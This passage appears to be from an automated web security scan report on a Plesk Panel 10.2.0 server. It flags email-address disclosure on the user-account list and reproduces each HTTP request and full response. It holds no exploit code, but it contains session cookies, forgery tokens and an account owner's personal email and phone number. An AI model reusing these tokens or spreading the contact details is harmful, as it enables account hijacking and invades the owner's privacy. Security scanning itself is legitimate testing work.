<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>User Accounts - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/user/action-name/list" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fuser%2Flist' + '&activeModule=' + 'users' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"active","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
</div>
<h2><span>User Accounts</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.bar.Tabs({
cls: 'tabs',
renderTo: 'main',
items: [{"componentType":"Jsw.bar.Button","title":"User Accounts","href":"\/user\/list","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"User Roles","href":"\/role\/list","containerCls":""}] });
});
//]]>
</script>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {

   new Jsw.Hint({
renderTo: 'main',
hint: 'If you want to allow other users to access the Panel for managing websites, installed applications, or use e-mail services under your domains, then you need to create user accounts.' });

new Jsw.Panel({
cls: 'list-box',
renderTo: 'main',
items: [
new Jsw.List({
id: 'users-list',
searchOveral: 'name',
data: {"pager":{"pageCount":1,"itemCountPerPage":25,"first":1,"current":1,"last":1,"pagesInRange":{"1":1},"firstPageInRange":1,"lastPageInRange":1,"currentItemCount":4,"totalItemCount":4,"firstItemNumber":1,"lastItemNumber":4},"state":{"sortField":"contactName","sortDirection":"up","currentPage":1,"itemsPerPage":25,"searchFilters":{"name":{"searchText":""},"email":{"searchText":""},"role":{"searchText":""}},"forceShowSearch":false},"data":[{"id":"3","isBuiltIn":"0","contactName":"format-1","email":"format-1@nosedivesailing.com","roleId":"7","roleName":"Application User","roleIsBuiltIn":"0","phone":null,"isLocked":"0"},{"id":"4","isBuiltIn":"0","contactName":"format-1","email":"fdf080d9155e57dfcfa94264@vulnerable.host.fqdn","roleId":"7","roleName":"Application User","roleIsBuiltIn":"0","phone":"1","isLocked":"0"},{"id":"5","isBuiltIn":"0","contactName":"format-1","email":"format-1fdf080d9644e588dffa16265@nosedivesailing.com","roleId":"7","roleName":"Application User","roleIsBuiltIn":"0","phone":null,"isLocked":"0"},{"id":"2","isBuiltIn":"1","contactName":"Hoyt LLC Research","email":"h02332@gmail.com","roleId":"5","roleName":"Owner","roleIsBuiltIn":"1","phone":"+1 339 206 1886","isLocked":"0"}],"locale":{"recordsTotal":"%%total%% items total","pages":"Pages","firstPage":"First","lastPage":"Last","numberOfItemPerPage":"Number of entries per page","hideSearch":"Hide Search","showSearch":"Show Search","buttonSearch":"Search","buttonResetSearch":"Reset Search","noEntriesFound":"No items found.","itemsNotSelected":"Select items first.","messageBoxButtonYes":"Yes","messageBoxButtonNo":"No","messageBoxButtonOk":"OK","allItems":"All"}},
dataUrl: '/user/list-data',
disabledSelectHint: 'This user account cannot be removed because it is either a built-in user account or your own user account.',
       searchFilters: {"name":{"type":"text","fields":["contactName"],"options":null,"title":"Contact name","overal":false},"email":{"type":"text","fields":["email"],"options":null,"title":"E-mail address","overal":false},"role":{"type":"text","fields":["roleId"],"options":[{"type":"value","label":"Any","value":""},{"type":"value","label":"Accountant","value":"8"},{"type":"value","label":"Application User","value":"7"},{"type":"value","label":"Owner","value":"5"},{"type":"value","label":"WebMaster","value":"6"}],"title":"User role","overal":false}},
columns: [
Jsw.list.COLUMN_SELECTION,
{
header: 'Contact name',
sortable: true,
dataIndex: 'contactName',
renderer: function(item, isDisabled) {
var link = '<a href="' + Jsw.baseUrl + '/user/edit/id/' + item.id + '">'
+ item.contactName.escapeHTML() + '</a>';

var status = (1 == item.isLocked)
? ( '<span class="hint-attention ">' +
'Inactive' +
'</span>')
: '';

return link + status;
}
}, {
header: 'E-mail address',
sortable: true,
cls: 'minor',
dataIndex: 'email',
renderer: function(item) {
return item.email
? '<a href="mailto:' + item.email + '">' + item.email + '</a>'
: '';
}
}, {
header: 'Role',
cls: 'minor',
sortable: true,
dataIndex: 'roleName'
}
],
operations: [{
componentType: 'Jsw.SmallButton',
title: 'Create User Account',
description: 'Create a new user account.',
addCls: 'sb-add-user',
href: '/user/create'
}, {
componentType: 'Jsw.bar.Separator'
}, {
componentType: 'Jsw.SmallButton',
id: 'buttonRemoveUser',
title: 'Remove',
description: 'Remove the selected user accounts.',
addCls: 'sb-remove-selected',
handler: function() {
Jsw.getComponent('users-list').execGroupOperation({
url: '/user/delete/?redirect=/user/list/',
subtype: 'delete',
locale: {
confirmOnGroupOperation: 'Remove the selected user accounts?' }
});
}
}
],
isDisabledItem: function(item) {
return ((1 == item.isBuiltIn) || (item.id == 2));
}
})
]
});
});
//]]>
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

11.12. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/list  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/list

Issue detail

The following email addresses were disclosed in the response:

Request

GET /smb/user/list HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/admin-home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:29:07 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:29:07 GMT
Connection: close
Content-Length: 14317

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>User Accounts - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/user/action-name/list" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fuser%2Flist' + '&activeModule=' + 'users' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"active","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
</div>
<h2><span>User Accounts</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.bar.Tabs({
cls: 'tabs',
renderTo: 'main',
items: [{"componentType":"Jsw.bar.Button","title":"User Accounts","href":"\/user\/list","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"User Roles","href":"\/role\/list","containerCls":""}] });
});
//]]>
</script>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {

   new Jsw.Hint({
renderTo: 'main',
hint: 'If you want to allow other users to access the Panel for managing websites, installed applications, or use e-mail services under your domains, then you need to create user accounts.' });

new Jsw.Panel({
cls: 'list-box',
renderTo: 'main',
items: [
new Jsw.List({
id: 'users-list',
searchOveral: 'name',
data: {"pager":{"pageCount":1,"itemCountPerPage":25,"first":1,"current":1,"last":1,"pagesInRange":{"1":1},"firstPageInRange":1,"lastPageInRange":1,"currentItemCount":4,"totalItemCount":4,"firstItemNumber":1,"lastItemNumber":4},"state":{"sortField":"contactName","sortDirection":"up","currentPage":1,"itemsPerPage":25,"searchFilters":{"name":{"searchText":""},"email":{"searchText":""},"role":{"searchText":""}},"forceShowSearch":false},"data":[{"id":"3","isBuiltIn":"0","contactName":"format-1","email":"format-1@nosedivesailing.com","roleId":"7","roleName":"Application User","roleIsBuiltIn":"0","phone":null,"isLocked":"0"},{"id":"4","isBuiltIn":"0","contactName":"format-1","email":"fdf080d9224fd0d18957a62c@vulnerable.host.fqdn","roleId":"7","roleName":"Application User","roleIsBuiltIn":"0","phone":null,"isLocked":"0"},{"id":"5","isBuiltIn":"0","contactName":"format-1","email":"format-1fdf080d9644e588dffa16265@nosedivesailing.com","roleId":"7","roleName":"Application User","roleIsBuiltIn":"0","phone":null,"isLocked":"0"},{"id":"2","isBuiltIn":"1","contactName":"Hoyt LLC Research","email":"h02332@gmail.com","roleId":"5","roleName":"Owner","roleIsBuiltIn":"1","phone":"+1 339 206 1886","isLocked":"0"}],"locale":{"recordsTotal":"%%total%% items total","pages":"Pages","firstPage":"First","lastPage":"Last","numberOfItemPerPage":"Number of entries per page","hideSearch":"Hide Search","showSearch":"Show Search","buttonSearch":"Search","buttonResetSearch":"Reset Search","noEntriesFound":"No items found.","itemsNotSelected":"Select items first.","messageBoxButtonYes":"Yes","messageBoxButtonNo":"No","messageBoxButtonOk":"OK","allItems":"All"}},
dataUrl: '/user/list-data',
disabledSelectHint: 'This user account cannot be removed because it is either a built-in user account or your own user account.',
       searchFilters: {"name":{"type":"text","fields":["contactName"],"options":null,"title":"Contact name","overal":false},"email":{"type":"text","fields":["email"],"options":null,"title":"E-mail address","overal":false},"role":{"type":"text","fields":["roleId"],"options":[{"type":"value","label":"Any","value":""},{"type":"value","label":"Accountant","value":"8"},{"type":"value","label":"Application User","value":"7"},{"type":"value","label":"Owner","value":"5"},{"type":"value","label":"WebMaster","value":"6"}],"title":"User role","overal":false}},
columns: [
Jsw.list.COLUMN_SELECTION,
{
header: 'Contact name',
sortable: true,
dataIndex: 'contactName',
renderer: function(item, isDisabled) {
var link = '<a href="' + Jsw.baseUrl + '/user/edit/id/' + item.id + '">'
+ item.contactName.escapeHTML() + '</a>';

var status = (1 == item.isLocked)
? ( '<span class="hint-attention ">' +
'Inactive' +
'</span>')
: '';

return link + status;
}
}, {
header: 'E-mail address',
sortable: true,
cls: 'minor',
dataIndex: 'email',
renderer: function(item) {
return item.email
? '<a href="mailto:' + item.email + '">' + item.email + '</a>'
: '';
}
}, {
header: 'Role',
cls: 'minor',
sortable: true,
dataIndex: 'roleName'
}
],
operations: [{
componentType: 'Jsw.SmallButton',
title: 'Create User Account',
description: 'Create a new user account.',
addCls: 'sb-add-user',
href: '/user/create'
}, {
componentType: 'Jsw.bar.Separator'
}, {
componentType: 'Jsw.SmallButton',
id: 'buttonRemoveUser',
title: 'Remove',
description: 'Remove the selected user accounts.',
addCls: 'sb-remove-selected',
handler: function() {
Jsw.getComponent('users-list').execGroupOperation({
url: '/user/delete/?redirect=/user/list/',
subtype: 'delete',
locale: {
confirmOnGroupOperation: 'Remove the selected user accounts?' }
});
}
}
],
isDisabledItem: function(item) {
return ((1 == item.isBuiltIn) || (item.id == 2));
}
})
]
});
});
//]]>
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

11.13. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/list/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/list/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /smb/user/list/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:13:12 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:13:11 GMT
Connection: close
Content-Length: 14319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>User Accounts - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/user/action-name/list" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fuser%2Flist%2F' + '&activeModule=' + 'users' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"active","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
</div>
<h2><span>User Accounts</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.bar.Tabs({
cls: 'tabs',
renderTo: 'main',
items: [{"componentType":"Jsw.bar.Button","title":"User Accounts","href":"\/user\/list","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"User Roles","href":"\/role\/list","containerCls":""}] });
});
//]]>
</script>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {

   new Jsw.Hint({
renderTo: 'main',
hint: 'If you want to allow other users to access the Panel for managing websites, installed applications, or use e-mail services under your domains, then you need to create user accounts.' });

new Jsw.Panel({
cls: 'list-box',
renderTo: 'main',
items: [
new Jsw.List({
id: 'users-list',
searchOveral: 'name',
data: {"pager":{"pageCount":1,"itemCountPerPage":25,"first":1,"current":1,"last":1,"pagesInRange":{"1":1},"firstPageInRange":1,"lastPageInRange":1,"currentItemCount":4,"totalItemCount":4,"firstItemNumber":1,"lastItemNumber":4},"state":{"sortField":"contactName","sortDirection":"up","currentPage":1,"itemsPerPage":25,"searchFilters":{"name":{"searchText":""},"email":{"searchText":""},"role":{"searchText":""}},"forceShowSearch":false},"data":[{"id":"3","isBuiltIn":"0","contactName":"format-1","email":"format-1@nosedivesailing.com","roleId":"7","roleName":"Application User","roleIsBuiltIn":"0","phone":null,"isLocked":"0"},{"id":"4","isBuiltIn":"0","contactName":"format-1","email":"fdf080d9224fd0d18957a62c@vulnerable.host.fqdn","roleId":"7","roleName":"Application User","roleIsBuiltIn":"0","phone":"1","isLocked":"0"},{"id":"5","isBuiltIn":"0","contactName":"format-1","email":"format-1fdf080d9644e588dffa16265@nosedivesailing.com","roleId":"7","roleName":"Application User","roleIsBuiltIn":"0","phone":null,"isLocked":"0"},{"id":"2","isBuiltIn":"1","contactName":"Hoyt LLC Research","email":"h02332@gmail.com","roleId":"5","roleName":"Owner","roleIsBuiltIn":"1","phone":"+1 339 206 1886","isLocked":"0"}],"locale":{"recordsTotal":"%%total%% items total","pages":"Pages","firstPage":"First","lastPage":"Last","numberOfItemPerPage":"Number of entries per page","hideSearch":"Hide Search","showSearch":"Show Search","buttonSearch":"Search","buttonResetSearch":"Reset Search","noEntriesFound":"No items found.","itemsNotSelected":"Select items first.","messageBoxButtonYes":"Yes","messageBoxButtonNo":"No","messageBoxButtonOk":"OK","allItems":"All"}},
dataUrl: '/user/list-data',
disabledSelectHint: 'This user account cannot be removed because it is either a built-in user account or your own user account.',
       searchFilters: {"name":{"type":"text","fields":["contactName"],"options":null,"title":"Contact name","overal":false},"email":{"type":"text","fields":["email"],"options":null,"title":"E-mail address","overal":false},"role":{"type":"text","fields":["roleId"],"options":[{"type":"value","label":"Any","value":""},{"type":"value","label":"Accountant","value":"8"},{"type":"value","label":"Application User","value":"7"},{"type":"value","label":"Owner","value":"5"},{"type":"value","label":"WebMaster","value":"6"}],"title":"User role","overal":false}},
columns: [
Jsw.list.COLUMN_SELECTION,
{
header: 'Contact name',
sortable: true,
dataIndex: 'contactName',
renderer: function(item, isDisabled) {
var link = '<a href="' + Jsw.baseUrl + '/user/edit/id/' + item.id + '">'
+ item.contactName.escapeHTML() + '</a>';

var status = (1 == item.isLocked)
? ( '<span class="hint-attention ">' +
'Inactive' +
'</span>')
: '';

return link + status;
}
}, {
header: 'E-mail address',
sortable: true,
cls: 'minor',
dataIndex: 'email',
renderer: function(item) {
return item.email
? '<a href="mailto:' + item.email + '">' + item.email + '</a>'
: '';
}
}, {
header: 'Role',
cls: 'minor',
sortable: true,
dataIndex: 'roleName'
}
],
operations: [{
componentType: 'Jsw.SmallButton',
title: 'Create User Account',
description: 'Create a new user account.',
addCls: 'sb-add-user',
href: '/user/create'
}, {
componentType: 'Jsw.bar.Separator'
}, {
componentType: 'Jsw.SmallButton',
id: 'buttonRemoveUser',
title: 'Remove',
description: 'Remove the selected user accounts.',
addCls: 'sb-remove-selected',
handler: function() {
Jsw.getComponent('users-list').execGroupOperation({
url: '/user/delete/?redirect=/user/list/',
subtype: 'delete',
locale: {
confirmOnGroupOperation: 'Remove the selected user accounts?' }
});
}
}
],
isDisabledItem: function(item) {
return ((1 == item.isBuiltIn) || (item.id == 2));
}
})
]
});
});
//]]>
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
